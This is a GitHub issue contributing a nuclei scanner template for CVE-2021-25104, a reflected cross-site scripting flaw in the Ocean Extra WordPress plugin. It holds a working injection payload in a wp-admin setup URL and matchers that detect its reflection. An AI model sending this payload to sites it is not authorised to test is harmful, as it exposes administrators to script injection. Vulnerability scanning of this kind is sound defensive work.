### ISSUE TITLE
Ocean Extra < 1.9.5 - Reflected Cross-Site Scripting

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4647]
```yaml
id: CVE-2021-25104

info:
  name: Ocean Extra < 1.9.5 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not escape generated links which are then used when the OceanWP theme is active, leading to a Reflected Cross-Site Scripting issue.
  reference:
    - https://wpscan.com/vulnerability/2ee6f1d8-3803-42f6-9193-3dd8f416b558
  tags: xss,wp,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/?step=demo&page=owp_setup&a"><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
